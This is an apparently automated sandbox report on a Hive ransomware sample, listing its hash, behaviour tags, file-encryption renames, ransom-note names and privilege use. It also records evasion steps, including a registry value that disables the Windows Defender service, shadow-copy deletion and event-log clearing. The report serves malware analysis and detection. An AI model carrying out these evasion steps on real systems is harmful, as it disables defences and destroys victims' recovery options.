Malware Analysis Report

2024-10-16 03:13

Sample ID 220323-kf4q7aehgm
Target ransomware.exe
SHA256 1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498

Threat Level: Known bad

The file ransomware.exe was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Hive

Modifies security service

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Deletes shadow copies

Clears Windows event logs

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Opens file in notepad (likely ransom note)

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-23 08:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-23 08:33

Reported

2022-03-23 08:40

Platform

win7-20220311-en

Max time kernel

4294202s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\ProtectSelect.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\SkipDebug.png => C:\Users\Admin\Pictures\SkipDebug.png.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\GetApprove.tiff => C:\Users\Admin\Pictures\GetApprove.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\OutSend.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\SendCheckpoint.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\DisableCompare.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\PingImport.tif => C:\Users\Admin\Pictures\PingImport.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\ProtectSelect.tiff => C:\Users\Admin\Pictures\ProtectSelect.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\RevokeOut.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\ShowOpen.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\StopSync.crw => C:\Users\Admin\Pictures\StopSync.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\SkipDebug.png.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\DisableCompare.tif => C:\Users\Admin\Pictures\DisableCompare.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\PingImport.tif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\RevokeOut.tiff => C:\Users\Admin\Pictures\RevokeOut.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\ShowOpen.raw => C:\Users\Admin\Pictures\ShowOpen.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\SendCheckpoint.raw => C:\Users\Admin\Pictures\SendCheckpoint.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopSync.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\SubmitReceive.raw => C:\Users\Admin\Pictures\SubmitReceive.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\SubmitReceive.raw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Users\Admin\Pictures\GetApprove.tiff.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File renamed C:\Users\Admin\Pictures\OutSend.crw => C:\Users\Admin\Pictures\OutSend.crw.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200467.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\mshwLatin.dll.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PACBELL.NET.XML.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PROGRAM.XML.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\PREVIEW.GIF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\THMBNAIL.PNG.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00231_.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Shades of Blue.htm C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BIZCARD.XML.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ARFR\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\slideShow.css C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Austin.eftx.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE.HXS.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\background.gif.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105292.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\utilityfunctions.js.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\.lastModified.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\PNG32.FLT.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00542_.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZUSR12.ACCDU.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityMergeFax.Dotx.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files\Microsoft Games\Mahjong\ja-JP\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-util-enumerations.xml_hidden.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\slideShow.html C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RICEPAPR\RICEPAPR.INF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR27F.GIF.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RES98.POC.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit.kLqiozcPP14NZ_edmmx7gygqZcBzHy0ZpBKj7091HWz_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
